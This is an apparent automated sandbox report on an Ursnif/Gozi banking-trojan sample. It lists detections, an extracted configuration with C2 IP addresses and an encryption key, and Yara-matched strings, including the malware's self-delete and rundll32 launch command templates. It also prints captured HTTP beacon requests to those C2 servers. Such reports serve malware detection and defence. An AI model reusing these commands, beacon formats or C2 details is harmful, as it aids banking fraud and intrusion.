
Windows Analysis Report
Server.exe

Overview

General Information

Sample Name: Server.exe
Analysis ID: 830522
MD5: 9565b4a15a8593ea3ec1f3c9d0a2e11a
SHA1: 0954c5387395f0552fa56f5b06b3bb159f0d430b
SHA256: 3aa75da2773573786f07530f5a09b8e0aacd0402fd11e14d8067b5f4607bbd6a
Tags: 2502557715, exe, geo, Gozi, ITA, Ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
Detected unpacking (changes PE section rights)
Snort IDS alert for network traffic
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Writes registry values via WMI
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • Server.exe (PID: 5744 cmdline: C:\Users\user\Desktop\Server.exe MD5: 9565B4A15A8593EA3EC1F3C9D0A2E11A)
  • cleanup
Name: Gozi, Ursnif
Description: 2000 Ursnif aka Snifula; 2006 Gozi v1.0, Gozi CRM, CRM, Papras; 2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia (*) -> 2010 Gozi Prinimalka -> Vawtrak/Neverquest. In 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed. It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula. In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi
{"RSA Public Key": "ScCjtIu/chsReaToemavuPsGfYIczuvCBclhySG8/AhfUJMnvau4hmaBPIAXScUh9/secJMcCpqd5yeayd2fJdEc3ETZJfeY55SskXGIyxmn6sJL8WH2YF95GitV+tnd52epRBd8/snxdFtGg4Pgf9kxQsW/ySpD96hQxlGzGgDApS0E54E54SLEBTqihX3FWN2//mDaDIJuoFz7lt0whvCg/8gXPBf/s2nkXoRwyyqXguvwDcw9IZEu1NT1qqIwpXL9DGldaMvwfXTGOLIkQX35RsJJDpP1V5Mcgc+c1nBRPKqGQz+NUtKDBiyp0RXMK3jDdMGWvimLl80kvMkvSd8fQXtWRcZ7DCuQwrQxkXo=", "c2_domain": ["checklist.skype.com", "62.173.142.81", "193.233.175.113", "109.248.11.184", "212.109.218.26", "185.68.93.7"], "botnet": "7715", "server": "50", "serpent_key": "xeaLJj1BwSDpjIfH", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Yara matches (Source / Rule / Description / Author / Strings):

Source: 00000000.00000002.513518394.00000000004E6000.00000040.00000020.00020000.00000000.sdmp
Rule: Windows_Trojan_RedLineStealer_ed346e4c
Description: unknown
Author: unknown
Strings:
  • 0x5a70:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B

Source: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp
Rule: Windows_Trojan_Smokeloader_3687686f
Description: unknown
Author: unknown
Strings:
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89

Source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_Ursnif
Description: Yara detected Ursnif
Author: Joe Security

Source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp
Rule: Windows_Trojan_Gozi_fd494041
Description: unknown
Author: unknown
Strings:
  • 0x1228:$a1: /C ping localhost -n %u && del "%s"
  • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xa9c:$a5: filename="%.4u.%lu"
  • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe6d:$a9: &whoami=%s
  • 0xe56:$a10: %u.%u_%u_%u_x%u
  • 0xd63:$a11: size=%u&hash=0x%08x
  • 0xb1d:$a12: &uptime=%u
  • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
  • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP

Source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp
Rule: Windows_Trojan_Gozi_261f5ac5
Description: unknown
Author: unknown
Strings:
  • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
  • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
  • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
  • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
  • 0x1cc0:$a9: Software\AppDataLow\Software\Microsoft\
    No Sigma rule has matched
    Snort IDS alerts:

    Timestamp: 03/20/23-13:15:36.320401
    Source IP: 192.168.2.6
    Destination IP: 193.233.175.113
    SID: 2033204
    Source Port: 49705
    Destination Port: 80
    Protocol: TCP
    Classtype: A Network Trojan was detected

    Timestamp: 03/20/23-13:15:16.126464
    Source IP: 192.168.2.6
    Destination IP: 62.173.142.81
    SID: 2033203
    Source Port: 49704
    Destination Port: 80
    Protocol: TCP
    Classtype: A Network Trojan was detected

    Timestamp: 03/20/23-13:15:16.126464
    Source IP: 192.168.2.6
    Destination IP: 62.173.142.81
    SID: 2033204
    Source Port: 49704
    Destination Port: 80
    Protocol: TCP
    Classtype: A Network Trojan was detected

    AV Detection

    Source: Server.exe | ReversingLabs: Detection: 35%
    Source: Server.exe | Virustotal: Detection: 46%
    Source: Server.exe | Joe Sandbox ML: detected
    Source: 0.2.Server.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen7
    Source: 00000000.00000002.513886233.00000000027F9000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Ursnif {"RSA Public Key": "ScCjtIu/chsReaToemavuPsGfYIczuvCBclhySG8/AhfUJMnvau4hmaBPIAXScUh9/secJMcCpqd5yeayd2fJdEc3ETZJfeY55SskXGIyxmn6sJL8WH2YF95GitV+tnd52epRBd8/snxdFtGg4Pgf9kxQsW/ySpD96hQxlGzGgDApS0E54E54SLEBTqihX3FWN2//mDaDIJuoFz7lt0whvCg/8gXPBf/s2nkXoRwyyqXguvwDcw9IZEu1NT1qqIwpXL9DGldaMvwfXTGOLIkQX35RsJJDpP1V5Mcgc+c1nBRPKqGQz+NUtKDBiyp0RXMK3jDdMGWvimLl80kvMkvSd8fQXtWRcZ7DCuQwrQxkXo=", "c2_domain": ["checklist.skype.com", "62.173.142.81", "193.233.175.113", "109.248.11.184", "212.109.218.26", "185.68.93.7"], "botnet": "7715", "server": "50", "serpent_key": "xeaLJj1BwSDpjIfH", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_02021508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError

    Compliance

    Source: C:\Users\user\Desktop\Server.exe | Unpacked PE file: 0.2.Server.exe.400000.0.unpack
    Source: Server.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\Server.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

    Networking

    Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49704 -> 62.173.142.81:80
    Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49704 -> 62.173.142.81:80
    Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49705 -> 193.233.175.113:80
    Source: Joe Sandbox View | ASN Name: SPACENET-ASInternetServiceProviderRU
    Source: Joe Sandbox View | ASN Name: REDCOM-ASRedcomKhabarovskRussiaRU
    Source: global traffic | HTTP traffic detected:
        GET /drew/vtZ_2FDIi/MRLim5q_2FPOOIVwJV5p/mDG55l02bkwr36hqtHV/_2BXyU_2BkyUgVl9WIyeMc/2k07Y9nJ9nLtT/PcL77Drj/unLXMitiTeAgURShweMUOiB/jO6Gh6u4qj/R0YL8nr8_2Fe_2F8S/NmYC2zbFo_2F/_2F9OVp7R5L/glgHLP7bYaSidB/FZsufB1rfZCbhP2GWCC1X/tQ2Xe4zo9AyYJ7HA/jNvemogj1MfecHx/YKLEAqQON4Cy4b59f3/zq6LmLb43/Vud6lYhHL1LCLqJWQEpj/MZMy2z9wXkXjHl/Y_2BX.jlk HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
        Host: 62.173.142.81
        Connection: Keep-Alive
        Cache-Control: no-cache
    Source: global traffic | HTTP traffic detected:
        GET /drew/qHKukbBQWu/Xw77sqXTqtrxRWpPD/yl9MR0Y2eNmn/GbsfhYjdl8H/5GaIgAKgHB90sh/aMn4M6bKKJciYELDTreaM/i8dqMbDS0rDZpO_2/F2s0PNMupq8bNg2/sWxA9_2FGI7DvJntWq/sJDzxIUTO/r8bT3UibSNEQXXaTJdFi/yG6uB8JAsWc6GRKrJig/fWv9nw4MT1weBq8HJPcdl7/ZF86bHFVi_2FJ/yinUV20K/IPPC4VuFn7ORSOMnH_2FY6_/2FwmfjECDI/_2B41PRFw9jRfkH5W/0EbKz9E3ebE/0M10.jlk HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
        Host: 193.233.175.113
        Connection: Keep-Alive
        Cache-Control: no-cache
    Source: unknown | DNS traffic detected: query: checklist.skype.com, reply code: Name error (3)
    Source: unknown | TCP traffic detected without corresponding DNS query: 62.173.142.81 (5 events)
    Source: unknown | TCP traffic detected without corresponding DNS query: 193.233.175.113 (6 events)
    Source: Server.exe, 00000000.00000002.513863268.00000000023BC000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://193.23
    Source: unknown | DNS traffic detected: queries for: checklist.skype.com

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    Source: Yara match | File source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: Server.exe PID: 5744, type: MEMORYSTR

    E-Banking Fraud

    Source: Yara match | File source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: Server.exe PID: 5744, type: MEMORYSTR
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_02021508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError

    System Summary

    Source: 00000000.00000002.513518394.00000000004E6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
    Source: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
    Source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
    Source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
    Source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
    Source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
    Source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
    Source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
    Source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
    Source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
    Source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
    Source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
    Source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
    Source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
    Source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
    Source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
    Source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
    Source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
    Source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
    Source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
    Source: Process Memory Space: Server.exe PID: 5744, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
    Source: Process Memory Space: Server.exe PID: 5744, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
    Source: C:\Users\user\Desktop\Server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
    Source: C:\Users\user\Desktop\Server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
    Source: C:\Users\user\Desktop\Server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
    Source: C:\Users\user\Desktop\Server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
    Source: C:\Users\user\Desktop\Server.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
    Source: C:\Users\user\Desktop\Server.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
    Source: C:\Users\user\Desktop\Server.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
    Source: Server.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000000.00000002.513518394.00000000004E6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c | reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f | reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 | reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 | reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 | reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 | reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 | reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 | reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 | reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 | reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 | reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 | reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 | reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 | reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 | reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 | reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 | reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 | reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
